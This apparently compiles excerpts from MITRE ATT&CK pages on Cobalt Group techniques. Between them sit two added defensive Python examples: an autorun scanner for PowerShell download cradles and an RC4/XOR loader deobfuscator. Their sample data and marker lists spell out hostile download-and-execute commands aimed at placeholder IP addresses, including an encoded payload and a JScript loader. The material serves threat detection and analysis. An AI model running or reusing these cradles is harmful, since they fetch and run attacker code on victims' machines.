…lities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution. [23] [24] G0080 Cobalt Group Cobalt Group has exploited multiple vulnerabilities for execution, including Microsoft’s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-20…
…an search for processes with antivirus and antimalware product names. [10] [11] G0080 Cobalt Group Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine. [12] S0244 Comnie Comnie attempts to detect…
…ick on the malicious Word document to execute the next part of the attack. [42] G0080 Cobalt Group Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine. [43] [44] S0527 CSPY Downloader CSPY Downlo…
…d can be used to copy files to/from a remotely connected external system. [130] G0080 Cobalt Group Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. [131] [3] The group's JavaScript backdoor is also…
… S0144 ChChes ChChes establishes persistence by adding a Registry Run key. [51] G0080 Cobalt Group Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch a PowerShell command that downloads Cobalt Strike. [52] S0338 Cobian R…
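The Run-key and Startup-folder persistence described above has a reliable defensive handle: a PowerShell download cradle sitting in an autorun location. The following Python is an added example, not code from the ATT&CK page or from any group it describes. It scans autorun entries (location, value name, command) and flags those that launch PowerShell with cradle markers (Net.WebClient, DownloadString, Invoke-WebRequest, IEX) or evasion flags (-w hidden, -nop, -ep bypass), decoding any -EncodedCommand payload first so the markers are checked against the real script. The entries, hostnames and IP addresses in SAMPLE_AUTORUNS are constructed for the demonstration; in practice you would feed it output from autorunsc or a registry export.

```python
import base64
import binascii
import re
from typing import NamedTuple


class Finding(NamedTuple):
    location: str
    name: str
    command: str        # command line, with any -EncodedCommand payload decoded and appended
    indicators: tuple   # which cradle / evasion markers matched


# Markers of a PowerShell download cradle. Matching is case-insensitive (we lower-case the command).
CRADLE_MARKERS = (
    "net.webclient", "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
    "invoke-expression", "iex ", "iex(", "start-bitstransfer", "frombase64string",
    "http://", "https://",
)
# Flags that are rare in legitimate autorun entries but common in loaders.
EVASION_MARKERS = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile",
                   "-ep bypass", "-exec bypass", "-executionpolicy bypass")

POWERSHELL_RE = re.compile(r"\b(?:powershell(?:\.exe)?|pwsh(?:\.exe)?)\b", re.I)
# PowerShell accepts unambiguous prefixes of -EncodedCommand; cover the common spellings.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(command: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) to the command so
    indicator matching sees the script rather than an opaque base64 blob."""
    m = ENCODED_RE.search(command)
    if not m:
        return command
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le", "ignore")
    except (binascii.Error, ValueError):
        return command
    return f"{command} <decoded: {decoded}>"


def analyze_autoruns(entries):
    """Return a Finding for every autorun entry that starts PowerShell with a download cradle.
    PowerShell entries without a cradle marker are not flagged, to keep the output precise."""
    findings = []
    for location, name, command in entries:
        if not POWERSHELL_RE.search(command):
            continue
        expanded = decode_encoded_command(command)
        low = expanded.lower()
        hits = tuple(m for m in CRADLE_MARKERS + EVASION_MARKERS if m in low)
        if any(m in low for m in CRADLE_MARKERS):
            findings.append(Finding(location, name, expanded, hits))
    return findings


# ---- Constructed sample data (hypothetical hosts and addresses, not from the page) ----
_ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.22/cs')".encode("utf-16le")
).decode()

SAMPLE_AUTORUNS = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"%windir%\system32\SecurityHealthSystray.exe"),
    # Run-key cradle in clear text
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://203.0.113.10:8080/a'))\""),
    # Startup-folder shortcut whose target hides the cradle in -EncodedCommand
    (r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup", "sys.lnk",
     f"cmd.exe /c powershell -ep bypass -enc {_ENC_PAYLOAD}"),
    # Benign PowerShell autorun: no cradle, so it is not flagged
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "LogonScript",
     r"powershell.exe -File C:\ProgramData\it\mapdrives.ps1"),
]


if __name__ == "__main__":
    for f in analyze_autoruns(SAMPLE_AUTORUNS):
        print(f"{f.location}\\{f.name}: {', '.join(f.indicators)}")
```

The -EncodedCommand decoding is the step most home-grown checks miss: a Run value that only contains `powershell -enc …` matches none of the string indicators until the UTF-16LE payload is decoded. Any PowerShell in an autorun location is still worth a manual look; the cradle requirement only controls what the script flags automatically.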
…red by sending victims a phishing email containing a malicious .docx file. [45] G0080 Cobalt Group Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc,…
…infected host. [65] G0114 Chimera Chimera has encoded PowerShell commands. [66] G0080 Cobalt Group Cobalt Group obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR and RC4. [67] [68] S0154 Cobalt Strike Cobalt Strike can hash function…
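The XOR and RC4 obfuscation noted above is cheap to apply and, when the key is recoverable from the dropper, cheap to strip. The following Python is an added example, not code from the ATT&CK page or from any group it describes. It implements RC4 (verified against the well-known "Key"/"Plaintext" test vector), a repeating-key XOR, and a small scorer that brute-forces a single-byte XOR layer by preferring printable output containing loader tokens. The sample JScript loader, its RC4 key and the layering order RC4(key, XOR(0x5A, script)) are constructed for the demonstration; real samples may nest the layers differently or use a multi-byte XOR key, which needs a key-length guess before the byte-wise search.

```python
# Tokens a JScript/PowerShell loader typically contains; matching is case-sensitive on purpose,
# because XOR with 0x20 flips letter case and would otherwise produce a false near-match.
SCRIPT_TOKENS = (b"ActiveXObject", b"WScript.Shell", b"powershell", b"New-Object",
                 b"DownloadString", b"cmd.exe", b"eval(", b"function")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_with_key(key: bytes, data: bytes) -> bytes:
    """Repeating-key XOR; a one-byte key gives the single-byte XOR seen in simple loaders."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def script_score(candidate: bytes) -> float:
    """Printable-ASCII ratio (0..1) plus one point per loader token found."""
    if not candidate:
        return 0.0
    printable = sum(1 for b in candidate if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
    return printable / len(candidate) + sum(1 for tok in SCRIPT_TOKENS if tok in candidate)


def brute_force_single_byte_xor(blob: bytes):
    """Try all 256 keys and return (key, plaintext) for the best-scoring candidate."""
    best = max(range(256), key=lambda k: script_score(xor_with_key(bytes([k]), blob)))
    return best, xor_with_key(bytes([best]), blob)


def deobfuscate(blob: bytes, rc4_key: bytes):
    """Strip the outer RC4 layer with the recovered key, then brute-force the inner XOR byte."""
    return brute_force_single_byte_xor(rc4(rc4_key, blob))


# ---- Constructed sample (hypothetical loader and key, not real group tooling) ----
SAMPLE_SCRIPT = (
    b'var sh = new ActiveXObject("WScript.Shell");\n'
    b'sh.Run("powershell -w hidden -nop -c \\"IEX (New-Object Net.WebClient)'
    b'.DownloadString(\'http://203.0.113.10/x\')\\"", 0);\n'
)
SAMPLE_RC4_KEY = b"k3y-from-the-dropper"
SAMPLE_XOR_KEY = 0x5A
SAMPLE_BLOB = rc4(SAMPLE_RC4_KEY, xor_with_key(bytes([SAMPLE_XOR_KEY]), SAMPLE_SCRIPT))


if __name__ == "__main__":
    key, script = deobfuscate(SAMPLE_BLOB, SAMPLE_RC4_KEY)
    print(f"recovered XOR key 0x{key:02x}")
    print(script.decode())
```

Layer order matters for the search: the XOR byte can only be brute-forced on data that is otherwise plaintext, so the RC4 layer must be removed first with the key carved from the dropper. Brute-forcing the XOR byte directly on the RC4 output scores every candidate equally badly.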
…opper China Chopper's server component can spider authentication portals. [19] G0080 Cobalt Group Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning. [20] [21] [22] S0154 Cobalt Strike Cobalt Strike can perform port scans fr…
…isting function within that process with a new function from that library. [25] G0080 Cobalt Group Cobalt Group has injected code into trusted processes. [26] S0154 Cobalt Strike Cobalt Strike can inject a variety of payloads into processes dynamically chosen by the adversary. [2…
…d a .NET Runtime Optimization vulnerability for privilege escalation. [14] [15] G0080 Cobalt Group Cobalt Group has used exploits to increase their levels of rights and privileges. [16] S0154 Cobalt Strike Cobalt Strike can exploit vulnerabilities such as MS14-058. [17] [18] S005…
…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. Trend Micro Research. (2023, July 21). Ransomware Spotli…
…ich led to the download of a ZIP archive containing a malicious .LNK file. [23] G0080 Cobalt Group Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine. [24] [25] [26] G0142 Confucius Confucius has lure…